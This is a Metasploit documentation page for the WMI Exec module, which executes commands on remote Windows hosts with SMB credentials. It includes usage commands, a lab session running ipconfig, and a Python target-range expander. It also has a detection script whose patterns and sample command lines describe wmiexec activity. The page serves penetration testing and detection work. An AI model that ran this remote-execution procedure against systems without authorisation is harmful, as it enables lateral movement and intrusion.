WMI Exec - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/smb/impacket/wmiexec Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: WMI Exec
Module: auxiliary/scanner/smb/impacket/wmiexec
Source code: modules/auxiliary/scanner/smb/impacket/wmiexec.py
Disclosure date: 2018-03-19
Last modification time: 2021-07-19 14:47:39 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module is also known as wmiexec.py.
A similar approach to psexec but executing commands through WMI.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/smb/impacket/wmiexec
msf auxiliary(wmiexec) > show options
... show and set options ...
msf auxiliary(wmiexec) > set RHOSTS ip-range
msf auxiliary(wmiexec) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(wmiexec) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(wmiexec) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(wmiexec) > set RHOSTS file:/tmp/ip_list.txt
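The three RHOSTS forms above (dotted range, CIDR, file:<path>) are expanded by the framework into one target per thread. As an added example that is not Metasploit's own code, the Python function below approximates that expansion for IPv4 so the forms can be compared offline. It assumes a read_file hook for the file: form (so the example runs without touching disk) and it skips a CIDR block's network and broadcast addresses, which the framework's Rex::Socket::RangeWalker may not do; it also accepts the short range form a.b.c.d-N (last octet only), which the page does not show but the framework supports.

```python
import ipaddress

def expand_rhosts(spec, read_file=None):
    """Expand a Metasploit-style RHOSTS value into an ordered list of IPv4 strings.

    Supported tokens (whitespace separated): a single address, a dotted range
    'a.b.c.d-w.x.y.z', a short range 'a.b.c.d-N' (last octet only), a CIDR
    block, and 'file:<path>' whose lines are themselves any of the above.
    read_file(path) -> str is a hook used instead of open() so callers (and
    this example's tests) can supply the file contents in memory.
    """
    targets = []
    for token in spec.split():
        if token.startswith("file:"):
            path = token[len("file:"):]
            text = read_file(path) if read_file else open(path).read()
            for line in text.splitlines():
                line = line.strip()
                if line and not line.startswith("#"):   # allow comments in host files
                    targets.extend(expand_rhosts(line, read_file))
        elif "/" in token:
            # strict=False lets '192.168.1.1/24' mean the /24 containing that host
            net = ipaddress.IPv4Network(token, strict=False)
            targets.extend(str(ip) for ip in net.hosts())
        elif "-" in token:
            lo_s, hi_s = token.split("-", 1)
            if "." not in hi_s:                           # short form: only last octet given
                hi_s = lo_s.rsplit(".", 1)[0] + "." + hi_s
            lo, hi = ipaddress.IPv4Address(lo_s), ipaddress.IPv4Address(hi_s)
            if hi < lo:
                raise ValueError(f"range end before start: {token}")
            targets.extend(str(ipaddress.IPv4Address(n)) for n in range(int(lo), int(hi) + 1))
        else:
            targets.append(str(ipaddress.IPv4Address(token)))
    # drop duplicates (e.g. a host listed twice in a file) but keep first-seen order
    return list(dict.fromkeys(targets))

if __name__ == "__main__":
    # constructed host file, stood in for /tmp/ip_list.txt
    fake_files = {"/tmp/ip_list.txt": "# lab hosts\n192.168.90.11\n10.0.3.0/30\n"}
    for spec in ("192.168.1.3-192.168.1.5", "192.168.1.1/24", "file:/tmp/ip_list.txt"):
        hosts = expand_rhosts(spec, read_file=fake_files.get)
        print(f"{spec}: {len(hosts)} target(s), first {hosts[0]}, last {hosts[-1]}")
```

Each resulting address is what the module logs in the "Running for ..." line of the scan output.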
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
COMMAND: The command to execute
SMBPass: The password for the specified username
SMBUser: The username to authenticate as
Knowledge Base
Verification Steps
- Install Impacket v0.9.17 from GitHub. The impacket package must be in Python's module path, so import impacket works from any directory.
- Install pycrypto v2.7 (the experimental release). Impacket requires this specific version.
- Start msfconsole
- Do: use auxiliary/scanner/smb/impacket/wmiexec
- Set: COMMAND, RHOSTS, SMBUser, SMBPass
- Do: run, and see the command result (if OUTPUT is enabled)
Options
OUTPUT
When the OUTPUT option is enabled, the command's result is redirected to a temporary file on the remote host, fetched back over the ADMIN$ share (the share the module passes to WMIEXEC; see the run() snippet under Error Messages) and then deleted. This lets the module user see the command output, but it also means the output touches the target's disk before it is retrieved and removed, leaving file-creation and share-access artifacts that a run with OUTPUT set to false does not. With OUTPUT disabled the command still executes, but nothing is returned to the module.
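The OUTPUT caveat above is also the detection opportunity: the target sees a shell spawned by the WMI provider host whose command line redirects into the ADMIN$ share. The Python below is an added example, not code from this page or from Metasploit, that runs two such rules over constructed Sysmon Event ID 1 (process creation) records. It assumes Sysmon's Image, ParentImage, CommandLine and User field names, and it assumes the command-line shape produced by impacket's wmiexec.py (cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1), which this module wraps; the sample events, user name and timestamp are invented for the example.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 records, trimmed to the fields the rules need.
# Events 0 and 1 imitate what wmiexec-style execution leaves on the target
# (OUTPUT enabled and disabled respectively); events 2 and 3 are benign.
SAMPLE_EVENTS = [
    {   # OUTPUT enabled: output redirected to a temp file under ADMIN$ (C:\Windows)
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"cmd.exe /Q /c ipconfig 1> \\127.0.0.1\ADMIN$\__1522861847.12 2>&1",
        "User": r"WINDOWS8VM\spencer",
    },
    {   # OUTPUT disabled: no redirect, only the WmiPrvSE.exe -> cmd.exe spawn remains
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"cmd.exe /Q /c whoami",
        "User": r"WINDOWS8VM\spencer",
    },
    {   # benign: local inventory query, not spawned by the provider host
        "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"wmic os get caption",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # benign: interactive shell started from the desktop
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe",
        "User": r"WINDOWS8VM\spencer",
    },
]

# Output redirection into the ADMIN$ share over loopback. ADMIN$ maps to
# C:\Windows, which is where the module's temporary output file is written.
ADMIN_SHARE_REDIRECT = re.compile(
    r"\d?>\s*\\\\(?:127\.0\.0\.1|localhost)\\ADMIN\$\\", re.IGNORECASE)

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def classify(event):
    """Return a rule name for a suspicious WMI-spawned shell, or None."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    if parent != "wmiprvse.exe" or image not in SHELLS:
        return None
    if ADMIN_SHARE_REDIRECT.search(event.get("CommandLine", "")):
        return "wmiexec_output_via_admin_share"   # high confidence: OUTPUT=true pattern
    return "wmi_spawned_shell"                     # lower confidence: needs triage

def scan(events):
    """Map event index -> rule name for every event that a rule matched."""
    hits = {}
    for i, ev in enumerate(events):
        rule = classify(ev)
        if rule:
            hits[i] = rule
    return hits

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] user={ev['User']} cmd={ev['CommandLine']}")
```

The second rule is deliberately broad: legitimate management tooling does launch shells through WMI, so treat wmi_spawned_shell as a triage signal and wmiexec_output_via_admin_share as the confirming one. Pairing either with a Security 4624 type 3 logon for the same user shortly before the event ties it back to the SMB/DCOM authentication the module performs.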
Scenarios
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options
Module options (auxiliary/scanner/smb/impacket/wmiexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMAND    ipconfig         yes       The command to execute
   OUTPUT     true             yes       Get the output of the executed command
   RHOSTS     192.168.90.11    yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    wakawaka         yes       The password for the specified username
   SMBUser    spencer          yes       The username to authenticate as
   THREADS    1                yes       The number of concurrent threads
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > run
[*] [2018.04.04-17:10:47] Running for 192.168.90.11...
[*] [2018.04.04-17:10:47] 192.168.90.11 - SMBv3.0 dialect used
[*] [2018.04.04-17:10:47] 192.168.90.11 - Target system is 192.168.90.11 and isFDQN is False
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: \\\\WINDOWS8VM[\\PIPE\\atsvc]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: Windows8VM[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 10.0.3.15[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 192.168.90.11[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding chosen: ncacn_ip_tcp:192.168.90.11[49154]
[*] [2018.04.04-17:10:49]
Windows IP Configuration
Ethernet adapter Ethernet 5:
Connection-specific DNS Suffix . : foo.lan
Link-local IPv6 Address . . . . . : fe80::9ceb:820e:7c6b:def9%17
IPv4 Address. . . . . . . . . . . : 10.0.3.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.3.2
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Ethernet 3:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Ethernet 4:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.90.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.foo.lan:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : foo.lan
Tunnel adapter isatap.{70FE2ED7-E141-40A9-9CAF-E8556F6A4E80}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
[*] [2018.04.04-17:10:49] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Msfconsole Usage
Here is how the scanner/smb/impacket/wmiexec auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/smb/impacket/wmiexec
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show info
Name: WMI Exec
Module: auxiliary/scanner/smb/impacket/wmiexec
License: CORE Security License (Apache 1.1)
Rank: Normal
Disclosed: 2018-03-19
Provided by:
beto
Spencer McIntyre
Check supported:
No
Basic options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMAND                     yes       The command to execute
   OUTPUT     true             yes       Get the output of the executed command
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     yes       The password for the specified username
   SMBUser                     yes       The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)
Description:
A similar approach to psexec but executing commands through WMI.
References:
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
Also known as:
wmiexec.py
Module Options
This is a complete list of options available in the scanner/smb/impacket/wmiexec auxiliary module:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show options
Module options (auxiliary/scanner/smb/impacket/wmiexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMAND                     yes       The command to execute
   OUTPUT     true             yes       Get the output of the executed command
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     yes       The password for the specified username
   SMBUser                     yes       The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/smb/impacket/wmiexec auxiliary module:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show advanced
Module advanced options (auxiliary/scanner/smb/impacket/wmiexec):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/smb/impacket/wmiexec module can do:
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/smb/impacket/wmiexec auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/smb/impacket/wmiexec) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Module dependencies (impacket) missing, cannot continue
Here is a relevant code snippet related to the "Module dependencies (impacket) missing, cannot continue" error message:
        self.get_output()


def run(args):
    if dependencies_missing:
        module.log('Module dependencies (impacket) missing, cannot continue', level='error')
        return

    _msf_impacket.pre_run_hook(args)
    executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'],
                       share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
Related Pull Requests
- #15443 Merged Pull Request: Fix python3 compatibility with wmiexec module
- #15212 Merged Pull Request: Converts Python shebangs over to Python 3
- #13477 Merged Pull Request: Fix Python 3 syntax errors
- #12524 Merged Pull Request: Convert all python code to python3. Fixes #12506.
- #10570 Merged Pull Request: AKA Metadata Refactor
- #10106 Merged Pull Request: Add the scanner/smb/impacket/wmiexec module
See Also
Check also the following modules related to this module:
- exploit/windows/browser/wmi_admintools
- exploit/windows/local/ms16_014_wmi_recv_notif
- exploit/windows/local/ps_wmi_exec
- exploit/windows/local/wmi_persistence
- post/windows/gather/wmic_command
- auxiliary/scanner/smb/impacket/dcomexec
- auxiliary/scanner/smb/impacket/secretsdump
Authors
- beto
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.